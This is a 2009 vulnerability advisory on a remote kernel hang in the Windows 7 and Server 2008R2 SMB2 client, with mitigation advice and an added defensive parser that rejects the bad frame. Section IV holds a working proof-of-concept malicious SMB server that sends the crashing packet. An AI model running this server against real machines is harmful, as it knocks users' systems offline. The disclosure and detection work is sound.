=============================================<br>- Release date: November 11th, 2009<br>- Discovered by: Laurent Gaffié<br>- Severity: Medium/High<br>=============================================<br><br>I. VULNERABILITY<br>
-------------------------<br>Windows 7, Server 2008R2 Remote Kernel Crash<br><br>II. BACKGROUND<br>-------------------------<br>#FAIL,#FAIL,#FAIL<br>SDL FAIL: the 'Most Secure OS Ever' gives up a remote kernel crash in 2 minutes.<br>
#FAIL,#FAIL,#FAIL<br><br>III. DESCRIPTION<br>-------------------------<br>See <a href="http://g-laurent.blogspot.com/">http://g-laurent.blogspot.com/</a> for more details.<br><br>#Comment: This bug is specific to Windows 7/2008R2.<br>
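The advisory leaves the details to the blog, but the frame the PoC in section IV sends shows the trigger by itself: the 4-byte NetBIOS session header declares 0x9a bytes while 0x9e bytes of SMB2 NEGOTIATE response follow, and the response's SecurityBufferOffset/SecurityBufferLength pair (0x80 + 0x1e = 0x9e) points past the declared end of the message. The following is an added example, editor's code rather than anything from the advisory, and it does not model the Windows SMB2 client's code path. It re-types the PoC's bytes, parses them the way a conservative client or a network sensor would, bounds every offset/length pair against the declared NetBIOS length instead of against whatever happened to arrive, and shows that the same body is accepted once the header is corrected. Field names follow MS-SMB2; the check function, its return dictionary and the build_frame helper are this example's own.<br>

```python
import struct

NETBIOS_HDR_LEN = 4              # 1 byte message type + 24-bit big-endian length
SMB2_HDR_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
NEGOTIATE_RESP_FMT = "<HHHH16sIIIIQQHHI"   # 64-byte fixed part of the NEGOTIATE response

# SMB2 body of the advisory's PoC frame, re-typed here from its hex (158 = 0x9e bytes).
POC_BODY = bytes.fromhex(
    "fe534d42" "40000000" "00000000" "00000100"   # SMB2 header: \xfeSMB, StructureSize 64, Command NEGOTIATE
    "01000000" "00000000" "00000000" "00000000"   # Flags = SERVER_TO_REDIR, MessageId 0
    "00000000" "00000000" "00000000" "00000000"   # Reserved / TreeId / SessionId
    "00000000" "00000000" "00000000" "00000000"   # Signature (message is unsigned)
    "41000100" "02020000" "3082a411" "e3122341"   # NEGOTIATE resp: size 0x41, dialect 0x0202, ServerGuid...
    "aa4bad99" "fd52318d" "01000000" "00000100"   # ...GUID, Capabilities, MaxTransactSize
    "00000100" "00000100" "cf736774" "6260ca01"   # MaxReadSize, MaxWriteSize, SystemTime
    "cb51e019" "6260ca01" "80001e00" "204c4d20"   # ServerStartTime, SecurityBufferOffset 0x80, Length 0x1e
    "601c0606" "2b060105" "0502a012" "3010a00e"   # SPNEGO blob (30 bytes) starting at body offset 0x80
    "300c060a" "2b060104" "01823702" "020a"
)
# The PoC prepends a NetBIOS header that claims 0x9a bytes instead of 0x9e.
POC_FRAME = b"\x00\x00\x00\x9a" + POC_BODY


def build_frame(body):
    """Prepend a correct NetBIOS session header (type 0, 24-bit big-endian length)."""
    return b"\x00" + len(body).to_bytes(3, "big") + body


def check_negotiate_frame(frame):
    """Parse a NetBIOS-framed SMB2 NEGOTIATE response and list its consistency problems."""
    if len(frame) < NETBIOS_HDR_LEN + SMB2_HDR_LEN + 64:
        raise ValueError("frame too short for an SMB2 NEGOTIATE response")
    msg_type = frame[0]
    declared = int.from_bytes(frame[1:4], "big")
    body = frame[NETBIOS_HDR_LEN:]
    actual = len(body)

    proto, struct_size, _credit_charge, status, command, _credits, flags = \
        struct.unpack_from("<4sHHIHHI", body, 0)
    (resp_size, _sec_mode, dialect, _rsv, _guid, _caps, _max_tx, _max_rd,
     _max_wr, _systime, _starttime, sec_off, sec_len, _rsv2) = \
        struct.unpack_from(NEGOTIATE_RESP_FMT, body, SMB2_HDR_LEN)

    problems = []
    if msg_type != 0:
        problems.append("NetBIOS message type %#x is not a session message" % msg_type)
    if proto != b"\xfeSMB" or struct_size != SMB2_HDR_LEN:
        problems.append("not an SMB2 header")
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        problems.append("not a NEGOTIATE response")
    if resp_size != 0x41:
        problems.append("NEGOTIATE response StructureSize %#x != 0x41" % resp_size)
    if declared != actual:
        problems.append("NetBIOS length %#x but %#x bytes of SMB2 data follow"
                        % (declared, actual))
    # Trust only the declared length: every offset/length pair inside the
    # message must fit within it, whatever the socket actually delivered.
    blob_end = sec_off + sec_len
    if sec_off < SMB2_HDR_LEN + 64 or blob_end > declared:
        problems.append("security buffer [%#x, %#x) lies outside the %#x-byte message"
                        % (sec_off, blob_end, declared))

    return {
        "declared_len": declared,
        "actual_len": actual,
        "status": status,
        "dialect": dialect,
        "sec_off": sec_off,
        "sec_len": sec_len,
        "problems": problems,
        "ok": not problems,
    }


if __name__ == "__main__":
    for name, frame in (("PoC frame", POC_FRAME), ("corrected frame", build_frame(POC_BODY))):
        result = check_negotiate_frame(frame)
        print(name, "OK" if result["ok"] else "REJECT")
        for p in result["problems"]:
            print("  -", p)
```

Run as a script it rejects the PoC frame for two reasons (length mismatch, security buffer past the declared end) and accepts the same body behind a corrected header; the point is that a parser which derives the message size from the NetBIOS header and then bounds every embedded offset against that size has a clean place to refuse the frame before any loop runs over it.<br>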
<br>IV. PROOF OF CONCEPT<br>-------------------------<br>#win7-crash.py:<br>#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)<br>#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.<br>
#NO BSOD, YOU GOTTA PULL THE PLUG.<br>#To trigger it quickly from the target, browse to \\this_script_ip_addr\BLAH ; it crashes instantly.<br>#Author: Laurent Gaffié<br>#<br><br>import socketserver<br><br># One canned SMB2 NEGOTIATE response. The 4-byte NetBIOS session header declares<br># 0x9a bytes, but the SMB2 body that follows is 0x9e bytes long; that mismatch is<br># what the PoC relies on, so it is deliberate.<br>packet = (<br>    b"\x00\x00\x00\x9a"  # ---> length should be 9e not 9a..<br>    b"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"<br>    b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br>    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br>    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br>    b"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"<br>    b"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"<br>    b"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"<br>    b"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"<br>    b"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"<br>    b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"<br>)<br><br><br>class SMB2(socketserver.BaseRequestHandler):<br>    # Answer whatever the client sends (its NEGOTIATE request) with the<br>    # malformed response, then drop the connection.<br>    def handle(self):<br>        print("Who:", self.client_address)<br>        self.request.recv(1024)<br>        self.request.sendall(packet)<br>        self.request.close()<br><br>socketserver.TCPServer.allow_reuse_address = True<br>launch = socketserver.TCPServer(('', 445), SMB2)  # listen on all interfaces, port 445 (needs root)<br>launch.serve_forever()<br>
<br>#SDL FAILED<br><br>V. BUSINESS IMPACT<br>-------------------------<br>An attacker can remotely crash any Windows 7 or Windows Server 2008R2 machine that connects to a malicious SMB2 server (for example by browsing to a UNC path that points at it).<br><br><br>VI. SYSTEMS AFFECTED<br>-------------------------<br>Windows 7, Windows Server 2008R2<br>
<br>VII. SOLUTION<br>-------------------------<br>No patch is available at the moment; the vendor does not care.<br>Disable the SMB feature or block the SMB ports (TCP 445, and 139 for NetBIOS-hosted SMB) until a real audit is done. Since the vulnerable side is the client that connects out to the attacker's server, outbound filtering matters as much as inbound.<br><br>VIII. REFERENCES<br>-------------------------<br>
<a href="http://blogs.msdn.com/sdl/">http://blogs.msdn.com/sdl/</a><br><a href="http://g-laurent.blogspot.com/">http://g-laurent.blogspot.com/</a><br><a href="http://twitter.com/g_laurent">http://twitter.com/g_laurent</a><br>
IX. CREDITS<br>-------------------------<br>This vulnerability has been discovered by Laurent Gaffié<br>Laurent.gaffie{remove-this}(at)gmail.com<br><br>X. REVISION HISTORY<br>-------------------------<br>
November 8th, 2009: MSRC contacted<br>November 8th, 2009: MSRC acknowledged the vuln<br>November 11th, 2009: MSRC tries to convince me that a multi-vendor IPv6 bug shouldn't appear in a security bulletin.<br>November 11th, 2009: Win 7 remote kernel smash released<br>
<br>XI. LEGAL NOTICES<br>-------------------------<br>The information contained within this advisory is supplied "as-is"<br>with no warranties or guarantees of fitness of use or otherwise.<br>I accept no responsibility for any damage caused by the use or<br>
misuse of this information.<br><br>XII. PERSONAL NOTES<br>-------------------------<br>More Remote Kernel FD @MS to come.<br>